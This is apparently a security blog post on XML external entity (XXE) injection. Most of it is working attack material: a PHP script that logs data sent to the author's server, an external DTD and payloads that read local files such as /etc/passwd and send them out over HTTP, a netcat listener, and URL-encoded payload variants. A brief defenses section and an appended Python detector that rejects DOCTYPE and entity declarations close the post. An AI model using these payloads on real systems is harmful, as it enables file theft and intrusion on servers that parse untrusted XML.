Preface
I ran into an XXE vulnerability, so I looked up some material and wrote these notes.
Before getting into it, a word on XML: XML was designed to transport and store data, while HTML was designed to display data, and XML must be strictly well-formed.
Vulnerability principle
1: The XML is attacker-controlled and the backend applies no filtering when processing it (this alone is enough).
2: The XML parser resolves external entities (this is the default).
Attack code
Server side
Get_Xxe.php
<?php
// Simply appends whatever arrives in the GET parameter "file" to the local file 1.txt
$txt = $_GET['file'];
if($txt) {
    $file = fopen("1.txt","a+");
    fwrite($file,"$txt"."\r\n");
    print($txt);
    fclose($file);
}
?>
1.dtd
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://www.bywalks.com/Get_Xxe.php?file=%file;'>" >
%all;
XML payload
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=E:/phpStudy/WWW/1.txt">
<!ENTITY % dtd SYSTEM "http://www.bywalks.com/1.dtd">
%dtd;
%send;
]>
Alternative payloads
// With echo (in-band)
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<x>&xxe;</x>

// Blind XXE
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://www.bywalks.com/Get_Xxe.php?file=XXE">
]>
<x>&xxe;</x>

Local nc listener: nc.exe -lvvp 83
Remote access: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://IP:83">]><foo>&xxe;</foo>
URLEncode: %3c!DOCTYPE+foo+%5b%3c!ENTITY+xxe+SYSTEM+%22http%3a%2f%2fIP%3a83%22%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e
PAYLOAD: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.bywalks.com/Get_Xxe.php?file=cunzai">]><foo>&xxe;</foo>
URLEncode: %3c!DOCTYPE+foo+%5b%3c!ENTITY+xxe+SYSTEM+%22http%3a%2f%2fwww.bywalks.com%2fGet_Xxe.php%3ffile%3ddoudoudou%22%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e
PAYLOAD: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
URLEncode: %3c!DOCTYPE+foo+%5b%3c!ENTITY+xxe+SYSTEM+%22file%3a%2f%2f%2fetc%2fpasswd%22%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e
file:///etc/passwd
php://filter/read=convert.base64-encode/resource=E:/phpStudy/WWW/1.txt
Defenses
1: Disable external entity loading, though SSRF may still be possible.
2: Filter characters and keywords such as <, > and ENTITY (as noted above, XML must be strictly well-formed, so once these are filtered the payload can no longer be parsed).
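As an added example, not code from the original post: a Python pre-parse gate that implements defense 2 more robustly than character filtering, rejecting any input that carries a DOCTYPE, an external (SYSTEM/PUBLIC) entity or a parameter entity before the document reaches a parser. The sample documents are constructed to mirror the payloads above, with a placeholder host.

```python
import re
import xml.etree.ElementTree as ET

# Indicators taken from the payload shapes shown in this post: every variant
# needs a DOCTYPE with an internal subset; the out-of-band ones additionally
# declare an external (SYSTEM/PUBLIC) entity or a parameter (% name) entity.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
PARAM_ENTITY_RE = re.compile(rb"<!ENTITY\s+%", re.IGNORECASE)


def xxe_findings(xml_bytes: bytes) -> list:
    """Return the XXE indicators present in the raw input (empty = clean)."""
    findings = []
    if DOCTYPE_RE.search(xml_bytes):
        findings.append("doctype")
    if EXTERNAL_ENTITY_RE.search(xml_bytes):
        findings.append("external-entity")
    if PARAM_ENTITY_RE.search(xml_bytes):
        findings.append("parameter-entity")
    return findings


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Gate untrusted XML before a parser ever sees its DTD.

    Any DOCTYPE is refused, not only ENTITY declarations: plain data
    exchange never needs one, and refusing it leaves nothing to resolve.
    Raises ValueError listing the reasons instead of parsing.
    """
    findings = xxe_findings(xml_bytes)
    if findings:
        raise ValueError("rejected XML input: " + ", ".join(findings))
    return ET.fromstring(xml_bytes)


# Constructed samples mirroring the post's payloads (the host is a placeholder).
BENIGN = b'<?xml version="1.0"?><x>hello</x>'
INBAND = (b'<?xml version="1.0"?><!DOCTYPE ANY ['
          b'<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>')
OOB_PARAM = (b'<!DOCTYPE ANY [<!ENTITY % dtd SYSTEM '
             b'"http://dtd-host.invalid/1.dtd"> %dtd; %send;]>')

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("inband", INBAND), ("oob", OOB_PARAM)):
        print(name, xxe_findings(doc) or "clean")
```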
Author:
Bywalks
Permalink:
http://bywalks.com/2017/12/20/%E6%B5%85%E8%B0%88xxe/
License:
Copyright (c) 2022 CC-BY-NC-4.0 LICENSE